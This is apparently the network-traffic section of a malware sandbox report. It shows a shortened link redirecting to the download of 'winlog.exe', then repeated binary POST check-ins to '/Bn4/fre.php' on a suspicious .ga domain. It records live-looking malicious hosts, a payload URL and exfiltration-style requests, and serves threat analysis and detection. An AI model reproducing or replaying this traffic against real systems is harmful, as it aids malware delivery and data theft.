Network Analysis

GET /fQHvj HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: bit.do Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 Date: Thu, 06 May 2021 01:35:41 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 337 Connection: keep-alive Location: http://nbnbtwowsdydebateqgh.dns.army/documenst/winlog.exe

GET /documenst/winlog.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: nbnbtwowsdydebateqgh.dns.army

HTTP/1.1 200 OK Date: Thu, 06 May 2021 01:35:45 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Last-Modified: Wed, 05 May 2021 22:49:57 GMT ETag: "2561d-5c19d0398712e" Accept-Ranges: bytes Content-Length: 153117 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

POST /Bn4/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dyjcgvdfgdzgzdzzf.ga Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2209781C Content-Length: 186 Connection: close

HTTP/1.1 404 Not Found Date: Thu, 06 May 2021 01:35:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: __cfduid=d68628206a01539a07746a3a2e28a277c1620264945; expires=Sat, 05-Jun-21 01:35:45 GMT; path=/; domain=.dyjcgvdfgdzgzdzzf.ga; HttpOnly; SameSite=Lax vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 09e0ea1ed40000eb65b3b3a000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8F%2FEplhC5ioyKb9OMPgiNdnfY2o%2FzzITF15hE%2B9OuaZy3lngL9nvRXoD9gdY3zpU5L49LZmv7158iXA9wg%2B41h4W%2F5ZlSTyagx9ua2z8DLkhxh2GUw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 64ae79448a54eb65-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

POST /Bn4/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dyjcgvdfgdzgzdzzf.ga Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2209781C Content-Length: 186 Connection: close

HTTP/1.1 404 Not Found Date: Thu, 06 May 2021 01:35:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: __cfduid=dacb1718d42af3d8eae310794fd074d631620264946; expires=Sat, 05-Jun-21 01:35:46 GMT; path=/; domain=.dyjcgvdfgdzgzdzzf.ga; HttpOnly; SameSite=Lax Vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 09e0ea226f0000eac3a3083000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qOOnU96emezHFcqTPC%2F%2BKfv%2FBpDtLlsWM%2FXSNR2m8WFi%2FORwrA9CHC3mQ%2FOy5RTQNLxeRnG6Nv5sHWB2FGHXZYBIiFwB9b2weSrSGyaFOzgJIOQovg%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 64ae794a4cd5eac3-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

POST /Bn4/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dyjcgvdfgdzgzdzzf.ga Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2209781C Content-Length: 159 Connection: close

HTTP/1.1 404 Not Found Date: Thu, 06 May 2021 01:35:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: __cfduid=d80b3a9044823a574e3bd0b1e9e7c8f9b1620264947; expires=Sat, 05-Jun-21 01:35:47 GMT; path=/; domain=.dyjcgvdfgdzgzdzzf.ga; HttpOnly; SameSite=Lax Vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 09e0ea25f9000004e744be9000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=yedgCbb4vwNSPsSj4GowpRlQJrAEcTjl2ex6I9dG3YLN5bSroJuMfpevETUBB3LJU51Q0%2Fiay03F92cfJTnXD6VR9JMlCBmrqRbZhkmR1Go58Ib1Rw%3D%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 64ae794ffc5304e7-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

POST /Bn4/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dyjcgvdfgdzgzdzzf.ga Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2209781C Content-Length: 159 Connection: close

HTTP/1.1 404 Not Found Date: Thu, 06 May 2021 01:36:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: __cfduid=d928cd1617f12c26bdf66154ba2f02f661620265008; expires=Sat, 05-Jun-21 01:36:48 GMT; path=/; domain=.dyjcgvdfgdzgzdzzf.ga; HttpOnly; SameSite=Lax Vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 09e0eb13e6000042dda2156000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bJHr15jZxclBvS5MXnXRj8FfM8agaShthd82SGc2cwo68MkKCBrmSQ62Zf%2FzhfHlkwJ7AS0WqO%2Fz5haictX%2FC92Y3UYDzGsMwJXw8dMj4luNMkKfzw%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 64ae7acca8a542dd-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400